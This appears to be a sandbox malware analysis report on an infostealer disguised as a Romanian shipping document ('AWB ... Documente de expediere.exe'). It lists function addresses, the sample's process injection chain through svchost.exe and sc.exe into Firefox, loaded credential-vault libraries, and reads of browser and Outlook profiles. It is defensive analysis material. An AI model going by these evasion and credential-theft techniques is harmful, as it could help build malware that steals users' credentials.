Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03043D40	1_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F1D5A	1_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F7D73	1_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305FDC0	1_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B9C32	1_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFCF2	1_2_030FFCF2
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0330A352	6_2_0330A352
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0325E3F0	6_2_0325E3F0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_033103E6	6_2_033103E6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032F0274	6_2_032F0274
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032D02C0	6_2_032D02C0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03240100	6_2_03240100
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032EA118	6_2_032EA118
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032D8158	6_2_032D8158
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_033041A2	6_2_033041A2
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_033101AA	6_2_033101AA
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_033081CC	6_2_033081CC
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032E2000	6_2_032E2000
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03250770	6_2_03250770
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03274750	6_2_03274750
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0324C7C0	6_2_0324C7C0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0326C6E0	6_2_0326C6E0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03250535	6_2_03250535
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03310591	6_2_03310591
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032F4420	6_2_032F4420
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03302446	6_2_03302446
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032FE4F6	6_2_032FE4F6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0330AB40	6_2_0330AB40
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03306BD7	6_2_03306BD7
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0324EA80	6_2_0324EA80
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03266962	6_2_03266962
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032529A0	6_2_032529A0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0331A9A6	6_2_0331A9A6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03252840	6_2_03252840
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0325A840	6_2_0325A840
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032368B8	6_2_032368B8
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0327E8F0	6_2_0327E8F0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03292F28	6_2_03292F28
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03270F30	6_2_03270F30
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032F2F30	6_2_032F2F30
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032C4F40	6_2_032C4F40
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032CEFA0	6_2_032CEFA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03242FC8	6_2_03242FC8
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0330EE26	6_2_0330EE26
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03250E59	6_2_03250E59
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0330CE93	6_2_0330CE93
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03262E90	6_2_03262E90
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0330EEDB	6_2_0330EEDB
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0325AD00	6_2_0325AD00
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032ECD1F	6_2_032ECD1F
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03268DBF	6_2_03268DBF
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0324ADE0	6_2_0324ADE0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03250C00	6_2_03250C00
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032F0CB5	6_2_032F0CB5
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03240CF2	6_2_03240CF2
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0330132D	6_2_0330132D
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0323D34C	6_2_0323D34C
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0329739A	6_2_0329739A
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032552A0	6_2_032552A0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032F12ED	6_2_032F12ED
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0326D2F0	6_2_0326D2F0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0326B2C0	6_2_0326B2C0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0328516C	6_2_0328516C
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0323F172	6_2_0323F172
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0331B16B	6_2_0331B16B
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0325B1B0	6_2_0325B1B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0330F0E0	6_2_0330F0E0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_033070E9	6_2_033070E9
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032FF0CC	6_2_032FF0CC
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032570C0	6_2_032570C0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0330F7B0	6_2_0330F7B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03295630	6_2_03295630
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_033016CC	6_2_033016CC
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03307571	6_2_03307571
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032ED5B0	6_2_032ED5B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_033195C3	6_2_033195C3
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0330F43F	6_2_0330F43F
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03241460	6_2_03241460
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0330FB76	6_2_0330FB76
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0326FB80	6_2_0326FB80
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0328DBF9	6_2_0328DBF9
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032C5BF0	6_2_032C5BF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032C3A6C	6_2_032C3A6C
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03307A46	6_2_03307A46
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0330FA49	6_2_0330FA49
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032EDAAC	6_2_032EDAAC
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03295AA0	6_2_03295AA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032F1AA3	6_2_032F1AA3
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032FDAC6	6_2_032FDAC6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032E5910	6_2_032E5910
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03259950	6_2_03259950
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0326B950	6_2_0326B950
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032BD800	6_2_032BD800
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032538E0	6_2_032538E0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0330FF09	6_2_0330FF09
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0330FFB1	6_2_0330FFB1
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03251F92	6_2_03251F92
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03213FD2	6_2_03213FD2
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03213FD5	6_2_03213FD5
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03259EB0	6_2_03259EB0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03307D73	6_2_03307D73
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03253D40	6_2_03253D40
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03301D5A	6_2_03301D5A
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0326FDC0	6_2_0326FDC0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032C9C32	6_2_032C9C32
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0330FCF2	6_2_0330FCF2
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008B2110	6_2_008B2110
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008ACFC0	6_2_008ACFC0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008AB1D0	6_2_008AB1D0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008AD1E0	6_2_008AD1E0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008AB31C	6_2_008AB31C
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008AB314	6_2_008AB314
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008AB320	6_2_008AB320
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008B57D0	6_2_008B57D0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008B39D0	6_2_008B39D0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008CBF80	6_2_008CBF80
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0310E563	6_2_0310E563
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0310E448	6_2_0310E448
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_031154D4	6_2_031154D4
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0310D9C8	6_2_0310D9C8
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0310E8FD	6_2_0310E8FD
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0310CC73	6_2_0310CC73

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: String function: 00D1EC2F appears 68 times
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: String function: 00D26AC0 appears 42 times
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: String function: 00D2F8A0 appears 35 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0302B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03087E54 appears 99 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 03297E54 appears 107 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 032CF290 appears 103 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 0323B970 appears 262 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 03285130 appears 58 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 032BEA12 appears 86 times

Source: AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1665719792.0000000004193000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs AWB_5771388044 Documente de expediere.exe
Source: AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1666244662.000000000433D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs AWB_5771388044 Documente de expediere.exe

Source: AWB_5771388044 Documente de expediere.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@4/3

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D4CE7A GetLastError,FormatMessageW,

0_2_00D4CE7A

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D3AB84 AdjustTokenPrivileges,CloseHandle,		0_2_00D3AB84
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D3B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00D3B134

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D4E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00D4E1FD

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D46532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00D46532

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D5C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_00D5C18C

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D0406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00D0406B

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

File created: C:\Users\user\AppData\Local\Temp\aut6327.tmp

Source: AWB_5771388044 Documente de expediere.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: sc.exe, 00000006.00000002.2915308329.0000000002DA2000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2429758064.0000000002D81000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2429878748.0000000002DA2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: AWB_5771388044 Documente de expediere.exe

ReversingLabs: Detection: 76%

Source: unknown	Process created: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe "C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe"
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe"
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe"	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\sc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\sc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Switches to a custom stack to bypass stack traces

Source: AWB_5771388044 Documente de expediere.exe

Static file information: File size 1226240 > 1048576

Source: AWB_5771388044 Documente de expediere.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: AWB_5771388044 Documente de expediere.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dnqNlDRmfuUrS.exe, 00000005.00000000.2173780390.000000000069E000.00000002.00000001.01000000.00000005.sdmp, dnqNlDRmfuUrS.exe, 00000007.00000002.2914995119.000000000069E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1664353093.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1665181590.0000000004020000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2248567406.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2248567406.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2155473181.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2156904567.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2916643666.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2916643666.0000000003210000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2250045957.0000000003067000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2248479905.0000000002E95000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sc.pdbUGP source: svchost.exe, 00000001.00000003.2216853278.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2216942488.0000000002A3B000.00000004.00000020.00020000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000005.00000003.2213928575.000000000103B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1664353093.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1665181590.0000000004020000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2248567406.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2248567406.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2155473181.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2156904567.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, sc.exe, sc.exe, 00000006.00000002.2916643666.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2916643666.0000000003210000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2250045957.0000000003067000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2248479905.0000000002E95000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sc.pdb source: svchost.exe, 00000001.00000003.2216853278.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2216942488.0000000002A3B000.00000004.00000020.00020000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000005.00000003.2213928575.000000000103B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: sc.exe, 00000006.00000002.2915308329.0000000002D1F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2917111114.000000000383C000.00000004.10000000.00040000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000007.00000002.2916712819.000000000341C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2540186843.000000000543C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: sc.exe, 00000006.00000002.2915308329.0000000002D1F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2917111114.000000000383C000.00000004.10000000.00040000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000007.00000002.2916712819.000000000341C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2540186843.000000000543C000.00000004.80000000.00040000.00000000.sdmp

Source: AWB_5771388044 Documente de expediere.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D1E01E LoadLibraryA,GetProcAddress,

0_2_00D1E01E

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D2C09E push esi; ret	0_2_00D2C0A0
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D2C187 push edi; ret	0_2_00D2C189
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D6C8BC push esi; ret	0_2_00D6C8BE
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D26B05 push ecx; ret	0_2_00D26B18
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D4B2B1 push FFFFFF8Bh; iretd	0_2_00D4B2B3
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D2BDAA push edi; ret	0_2_00D2BDAC
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D2BEC3 push esi; ret	0_2_00D2BEC5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004E184C push E711456Eh; retf	1_2_004E1809
